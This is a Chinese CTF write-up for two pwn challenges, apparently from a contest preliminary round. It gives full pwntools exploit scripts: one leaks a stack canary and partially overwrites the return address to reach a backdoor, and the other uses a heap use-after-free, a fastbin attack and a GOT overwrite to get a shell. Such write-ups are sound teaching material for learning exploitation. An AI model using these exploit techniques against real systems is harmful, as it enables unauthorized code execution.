铁三初赛PWN

多亏师傅们带飞,本次排名第四赛区第二,排名如下^_^

img

pwn1[namepie]

/*
 * IDA decompilation of the name/message prompt in the pwn1 binary.
 *
 * Both inputs land in the same stack buffer `s`.  Only 0x28 bytes separate
 * `s` (rbp-0x30) from the canary slot (rbp-0x8), yet the two read() calls
 * accept 0x30 and 0x60 bytes, so both overrun the buffer.  Returns the byte
 * count of the second read().
 */
ssize_t sub_9A0()
{
  char s; // [rsp+0h] [rbp-30h]   buffer base; 0x28 bytes lie between it and the canary
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]   saved stack canary

  v2 = __readfsqword(0x28u);    // load the canary from fs:0x28
  memset(&s, 0, 0x1EuLL);       // zeroes only 0x1E of the 0x28 bytes; the rest stay uninitialised
  puts("Input your Name:");
  read(0, &s, 0x30uLL);         // vuln 1: 0x30 > 0x28 -> the last 8 bytes spill onto the canary.
                                //   Overwriting its low (NUL) byte lets the "%s" below keep
                                //   printing, so the canary's upper 7 bytes are echoed back.
  printf("hello %s: and what do your want to sey!\n", &s);
  return read(0, &s, 0x60uLL);  // vuln 2: 0x60-byte stack overflow reaching the canary, saved rbp
                                //   and return address; with the leaked canary restored, a partial
                                //   overwrite of the return address reaches the backdoor (see EXP)
}

前言

程序留了后门函数,保护全开(PIE 开启,因此后门地址需要部分覆盖)。

思路

先利用第一次输入(最多 0x30 字节,缓冲区到 canary 只有 0x28 字节)把 canary 的最低字节(原本为 0x00)覆盖为非零值,使随后 printf 的 %s 连带输出 canary 的高 7 字节,从而泄露 canary;然后利用第二次输入(0x60 字节)的栈溢出,先原样写回 canary,再只覆盖返回地址的低 2 字节为后门函数地址。由于 PIE 不改变地址的低 12 位,这 2 字节中只有 1 个 nibble 需要猜,打通几率为 1/16,失败时重跑即可。

EXP

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
# Env: Linux arch 5.8.14-arch1-1

from pwn import *
import os

# --- tube helpers --------------------------------------------------------
# Short aliases over the pwntools tube `io`, which __main__ creates before
# exploit() runs.  Plain defs instead of lambdas; same arguments, same
# return values.

def r(x):
    """recv(x): read up to x bytes."""
    return io.recv(x)


def ra():
    """recvall(): read until EOF."""
    return io.recvall()


def rl():
    """recvline(): read one line, newline kept."""
    return io.recvline(keepends = True)


def ru(x):
    """recvuntil(x): read through x; the delimiter itself is dropped."""
    return io.recvuntil(x, drop = True)


def s(x):
    """send(x): raw send, no newline appended."""
    return io.send(x)


def sl(x):
    """sendline(x): send x followed by a newline."""
    return io.sendline(x)


def sa(x, y):
    """sendafter(x, y): wait for x, then send y."""
    return io.sendafter(x, y)


def sla(x, y):
    """sendlineafter(x, y): wait for x, then send y plus a newline."""
    return io.sendlineafter(x, y)


def ia():
    """Hand the tube over to the terminal."""
    return io.interactive()


def c():
    """Close the tube."""
    return io.close()


def li(x):
    """log.info(x) in orange so exploit progress stands out from debug output."""
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')


# Every send/recv is hexdumped at this level.
context.log_level='debug'
# gdb.attach() (see db()) opens in a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']

elf_path  = 'pwn'
libc_path = './libc.so.6'

# remote server ip and port (contest-internal address)
server_ip = "172.20.14.177"
server_port = 9999

# LOCAL=1: spawn ./pwn locally (gdb available via db()); 0: use the remote
# service.  LIBC=1: also parse libc_path and LD_PRELOAD it for local runs.
LOCAL = 0
LIBC  = 0

#--------------------------func-----------------------------
def db():
    """Attach gdb to the running target, but only for local runs (LOCAL != 0)."""
    if not LOCAL:
        return
    gdb.attach(io)


#--------------------------exploit--------------------------
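def exploit():
    """Leak the stack canary, then partially overwrite the return address.

    Stage 1 - canary leak.  sub_9A0 reads 0x30 bytes into a buffer that sits
    0x28 bytes below the canary (rbp-0x30 vs rbp-8).  We fill those 0x28
    bytes and replace the canary's low byte (normally 0x00) with 0x01, so the
    following printf("%s") runs on past the buffer and echoes the other
    seven canary bytes.

    Stage 2 - return-address overwrite.  The second read accepts 0x60 bytes,
    enough to cover the canary, the saved rbp and the return address.  We
    write the leaked canary back and replace only the two low bytes of the
    return address.  PIE leaves the low 12 bits of every address fixed, so
    only one nibble of those two bytes is a guess: 1/16 hit rate, re-run on
    failure.

    All payload literals are bytes so this works under Python 3 pwntools as
    well as Python 2 (the original str + p64() mix raises TypeError on 3).
    """
    li('exploit...')

    # Stage 1: fill the buffer exactly up to the canary and clobber its NUL
    # low byte with 0x01, which also serves as the recv delimiter.
    s(b'A' * 0x28 + b'\x01')
    ru(b'\x01')
    # The real low byte of a glibc canary is always 0x00; prepend it to the
    # seven leaked bytes to rebuild the full 64-bit value.
    canary = u64(b'\x00' + r(7))
    li('cannary: ' + hex(canary))

    # Stage 2: padding | canary | saved rbp | low 16 bits of the return address.
    # NOTE(review): 0xa71 is taken to be the backdoor's fixed page offset and
    # the 0xa000 nibble is the guess -- re-check against the binary if it is
    # ever rebuilt.
    p = b'A' * 0x28
    p += p64(canary)
    p += p64(0)
    p += b'\x71\xaa'
    # db()  # uncomment to break here under gdb on LOCAL runs
    s(p)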


def finish():
    """Give the shell to the user, then close the tube when they are done."""
    io.interactive()
    io.close()

#--------------------------main-----------------------------
if __name__ == '__main__':

    # The backdoor jump lands 1 time in 16 (see exploit()); the retry loop
    # below was left disabled, so re-run the script by hand on a miss.
    #for i in range(255):
    elf = ELF(elf_path)
    if LOCAL:
        if LIBC:
            libc = ELF(libc_path)
            io = elf.process(env = {"LD_PRELOAD" : libc_path} )
        else:
            io = elf.process()
    else:
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)

    exploit()
    finish()

pwn2 [onetime]

前言

PIE 保护没开,是一道菜单堆题,添加、删除、编辑操作各用一个标志位来阻止同一操作执行第二次。漏洞点在于释放内存后没有把数据指针清 0,而且其他操作也没有做相应检查,造成 UAF 漏洞。

思路

通过 UAF 改写已释放 chunk 的 fd 指针,把下一次分配打到 bss 段 buf 附近;借此把 edit_flag 改为 0 以便再次使用编辑功能,同时把 buf 指针改为 atoi 的 GOT 表地址。然后通过 dump 功能读出 GOT 中 atoi 的地址泄露 libc,再次利用编辑功能把 atoi 的 GOT 项改写为 libc 中 system 的地址,最后在菜单选项处输入 'sh\x00',atoi("sh") 实际执行 system("sh"),即可获得 shell。

EXP

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: i0gan
# Env: Linux arch 5.8.14-arch1-1

from pwn import *
import os

# --- tube helpers --------------------------------------------------------
# Short aliases over the pwntools tube `io` (created in __main__); plain
# defs with the same arguments and return values as the original lambdas.

def r(x):
    """recv(x): read up to x bytes."""
    return io.recv(x)


def ra():
    """recvall(): read until EOF."""
    return io.recvall()


def rl():
    """recvline(): read one line, newline kept."""
    return io.recvline(keepends = True)


def ru(x):
    """recvuntil(x): read through x; the delimiter itself is dropped."""
    return io.recvuntil(x, drop = True)


def s(x):
    """send(x): raw send, no newline appended."""
    return io.send(x)


def sl(x):
    """sendline(x): send x followed by a newline."""
    return io.sendline(x)


def sa(x, y):
    """sendafter(x, y): wait for x, then send y."""
    return io.sendafter(x, y)


def sla(x, y):
    """sendlineafter(x, y): wait for x, then send y plus a newline."""
    return io.sendlineafter(x, y)


def ia():
    """Hand the tube over to the terminal."""
    return io.interactive()


def c():
    """Close the tube."""
    return io.close()


def li(x):
    """log.info(x) in orange so exploit progress stands out from debug output."""
    return log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')


# Every send/recv is hexdumped at this level.
context.log_level='debug'
# gdb.attach() (see db()) opens in a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']

elf_path  = 'pwn'
# MODIFY_LD=1 turns this invocation into a one-shot "patch the interpreter"
# step (below) and exits before any exploitation.
MODIFY_LD = 0
arch = '64'
libc_v = '2.23'

# Local glibc tree used to run the binary under a specific glibc version.
glibc_root = '/glibc/' + libc_v + '/' + arch
ld_path   = glibc_root + '/lib/ld-linux-x86-64.so.2'
libs_path = glibc_root + '/lib'
libc_path = glibc_root + '/lib/libc.so.6'
# Immediately overrides the line above: the challenge-provided libc in the
# working directory is the one actually parsed and preloaded.
libc_path = './libc.so.6'

# change ld path: back up the binary, then repoint its PT_INTERP at ld_path.
# Both commands are shell strings, but every piece is a hard-coded constant,
# so there is no injection surface here.
if MODIFY_LD:
    os.system('cp ' + elf_path + ' ' + elf_path + '.bk')
    change_ld_cmd = 'patchelf  --set-interpreter ' + ld_path +' ' + elf_path
    os.system(change_ld_cmd)
    li('modify ld ok!')
    exit(0)

# remote server ip and port (contest-internal address)
server_ip = "172.20.14.177"
server_port = 10001

# LOCAL=1: spawn ./pwn locally; 0: use the remote service.
# LIBC=1: parse libc_path (required by exploit() for the libc symbols).
LOCAL = 0
LIBC  = 1


#--------------------------func-----------------------------
def db():
    """Attach gdb to the running target, but only for local runs (LOCAL != 0)."""
    if not LOCAL:
        return
    gdb.attach(io)

def ad():
    """Menu option 1 ("add"): allocate a chunk."""
    io.sendlineafter('>>', '1')

def fi(d):
    """Menu option 2 ("fill"/edit): send d as the chunk contents after the ':' prompt."""
    io.sendlineafter('>>', '2')
    io.sendafter(':', d)

def dp():
    """Menu option 3 ("dump"): print the chunk contents."""
    io.sendlineafter('>>', '3')

def rm():
    """Menu option 4 ("remove"): free the chunk (the pointer is not cleared -- UAF)."""
    io.sendlineafter('>>', '4')

def lv(d):
    """Menu option 5 ("leave"): send d after the ':' prompt.

    Presumably allocates a fresh chunk and writes d into it -- that is what
    the exploit relies on; confirm against the binary.
    """
    io.sendlineafter('>>', '5')
    io.sendafter(':', d)

#--------------------------exploit--------------------------
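def exploit():
    """UAF -> fastbin chunk into .bss -> GOT leak -> atoi@GOT = system -> "sh".

    Step 1: allocate and free a chunk.  The program keeps the dangling
    pointer, so "fill" still writes into the freed chunk, i.e. into its
    fastbin ``fd``.  We point ``fd`` just below the .bss globals
    (0x60207d + 0x10).  NOTE(review): the odd 0x7d offset presumably lines
    up a byte that satisfies the fastbin size check -- confirm in gdb if the
    binary is ever rebuilt.
    Step 2: the next "add" pops the genuine chunk; the allocation inside
    "leave" then returns the fake chunk, so its data overwrites the globals:
    3 bytes of padding, edit_flag = 0 (re-enables "fill"), buf = atoi@GOT.
    Step 3: "dump" now prints through buf, leaking atoi's libc address, from
    which libc base and system() are derived.
    Step 4: "fill" writes system into atoi@GOT; the menu's atoi("sh") then
    runs system("sh").

    Payload literals are bytes so the routine runs under Python 3 pwntools
    as well as Python 2 (the original str + p64()/bytes mixes raise
    TypeError on 3).  Requires LIBC=1 so that ``libc`` exists.
    """
    li('exploit...')

    # Step 1: UAF write into the freed chunk's fd pointer.
    ad()
    rm()
    fake_chunk = 0x60207d + 0x10
    fi(p64(fake_chunk))

    # Step 2: pop the real chunk, then let "leave" take the fake one and
    # overwrite the globals that follow it.
    ad()
    overwrite = b'A' * 3                  # pad up to edit_flag
    overwrite += p64(0)                   # edit_flag = 0 -> "fill" allowed again
    overwrite += p64(elf.got['atoi'])     # buf -> atoi@GOT
    lv(overwrite)

    # Step 3: leak atoi via "dump".  A userland libc address is 6 bytes ending
    # in 0x7f; ru() drops the delimiter, so re-append it plus two zero bytes.
    dp()
    leak = u64(ru(b'\x7f')[-5:] + b'\x7f\x00\x00')
    libc_base = leak - libc.sym['atoi']
    system = libc_base + libc.sym['system']
    li('libc_base: ' +hex(libc_base))

    # Step 4: atoi@GOT = system.  The trailing NUL keeps the menu's next
    # atoi()/system() argument to exactly "sh".
    fi(p64(system))
    # db()  # uncomment to break here under gdb on LOCAL runs
    s(b'sh\x00')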

def finish():
    """Give the shell to the user, then close the tube when they are done."""
    io.interactive()
    io.close()

#--------------------------main-----------------------------
if __name__ == '__main__':

    elf = ELF(elf_path)
    if LOCAL:
        # Run against the local glibc tree; with LIBC also preload libc_path.
        env = {"LD_LIBRARY_PATH" : libs_path}
        if LIBC:
            libc = ELF(libc_path)
            env["LD_PRELOAD"] = libc_path
        io = elf.process(env = env)
    else:
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)

    exploit()
    finish()